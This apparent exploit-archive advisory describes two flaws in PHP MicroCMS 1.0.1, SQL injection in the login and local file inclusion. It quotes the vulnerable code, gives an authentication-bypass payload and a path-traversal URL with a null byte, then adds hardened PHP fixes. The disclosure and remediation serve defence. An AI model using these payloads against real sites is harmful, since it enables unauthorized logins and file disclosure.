[webapps / 0day] - PHP MicroCMS 1.0.1 Multiple Remote Vulnerabilities
Posted on 15 September 2010
==================================================
PHP MicroCMS 1.0.1 Multiple Remote Vulnerabilities
==================================================

Title            : PHP MicroCMS 1.0.1 Multiple Remote Vulnerabilities
Affected Version : PHP MicroCMS <= 1.0.1
Vendor Site      : www.apphp.com/php-microcms/index.php
Discovery        : abysssec.com

Description:
This CMS has many critical vulnerabilities; some of them are described here.

Vulnerabilities:

1. Authentication bypass via SQL injection in the login page

The user_name and password parameters received from the login form are passed to the do_login function (login.php, lines 12-17):

    function Login() {
        $this->wrong_login = false;
        if (!$this->is_logged_in() && $_POST['submit'] == "Login"
            && !empty($_POST['user_name']) && !empty($_POST['password']))
            $this->do_login($_POST['user_name'], $_POST['password']);
        else if ($_POST['submit_logout'] == "Logout")
            $this->do_logout();
        $this->accounts = new Profiles($GLOBALS['user_session']->get_session_variable("session_account_id"));
    }

In do_login these parameters are passed on to the get_account_information function (login.php, lines 19-29):

    function do_login($user_name, $password, $do_redirect = true) {
        if ($account_information = $this->get_account_information($user_name, $password)) {
            $this->set_session_variables($account_information);
            if ($do_redirect) {
                header("Location: index.php ");
                exit;
            }
        } else {
            $this->wrong_login = true;
        }
    }

There both parameters are concatenated directly into the SQL query without any validation or escaping (login.php, lines 48-55):

    function get_account_information($user_name, $password) {
        // vulnerability here: $user_name and $password go into the query unescaped
        $sql = "SELECT ".DB_PREFIX."accounts.*, user_name AS account_name
                FROM ".DB_PREFIX."accounts
                WHERE user_name = '" . $user_name . "'
                AND password = AES_ENCRYPT('" . $password . "', '" . DB_ENCRYPT_KEY . "')";
        return database_query($sql, DATA_ONLY, FIRST_ROW_ONLY);
    }

PoC: on the login page enter
    username: a' or '1'='1
    password: a' or '1'='1

----------------------------------------------------------------------------------------------------

2. Local file inclusion

The page parameter is taken from the query string (index.php, line 21):

    $page = !empty($_GET['page']) ? $_GET['page'] : "home";

and used unfiltered to build the path that is included (index.php, lines 104-105):

    if (($page != "") && file_exists("page/" . $page . ".php")) {
        require("page/" . $page . ".php");

PoC: http://localhost/microcms/index.php?page=../include/base.inc.php%00

# Inj3ct0r.com [2010-09-15]
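Hardened versions of the two routines quoted above, as an added example that is not part of the advisory or of PHP MicroCMS: the login lookup binds user_name and password as PDO parameters instead of concatenating them, and the page resolver accepts only an allowlisted identifier before anything reaches require(). It assumes a PDO connection in $pdo, reuses the DB_PREFIX and DB_ENCRYPT_KEY constants from the original, and the allowlist contents are constructed.

```php
<?php
// Added example, not PHP MicroCMS code. Assumes a PDO connection in $pdo and the
// project's DB_PREFIX / DB_ENCRYPT_KEY constants; the page allowlist is constructed.

// 1. Login lookup with bound parameters: a value such as  a' or '1'='1  is
//    compared literally as a user name and can no longer alter the WHERE clause.
function get_account_information(PDO $pdo, string $user_name, string $password): ?array
{
    $sql = "SELECT " . DB_PREFIX . "accounts.*, user_name AS account_name"
         . " FROM " . DB_PREFIX . "accounts"
         . " WHERE user_name = :user_name"
         . " AND password = AES_ENCRYPT(:password, :key)";
    $stmt = $pdo->prepare($sql);
    $stmt->execute([
        ':user_name' => $user_name,
        ':password'  => $password,
        ':key'       => DB_ENCRYPT_KEY,
    ]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;   // null means "no such account", never a bypass
}

// 2. Page resolution: the request value must be a short bare identifier that is
//    also on the allowlist, so "../", ".", and null bytes never reach require().
function resolve_page(string $requested, string $page_dir = __DIR__ . '/page'): ?string
{
    $page = ($requested === '') ? 'home' : $requested;
    if (!preg_match('/\A[a-z0-9_]{1,32}\z/', $page)) {
        return null;                                   // rejects traversal and %00
    }
    $allowed = ['home', 'about', 'contact', 'news'];   // constructed allowlist
    if (!in_array($page, $allowed, true)) {
        return null;
    }
    $path = $page_dir . '/' . $page . '.php';
    return is_file($path) ? $path : null;
}

// Replacement for the file_exists/require pair in index.php:
// $path = resolve_page($_GET['page'] ?? '');
// if ($path === null) { http_response_code(404); exit; }
// require $path;
```

The %00 in the PoC works because PHP releases before 5.3.4 truncated file paths at a null byte; the identifier check above makes the fix independent of the PHP version.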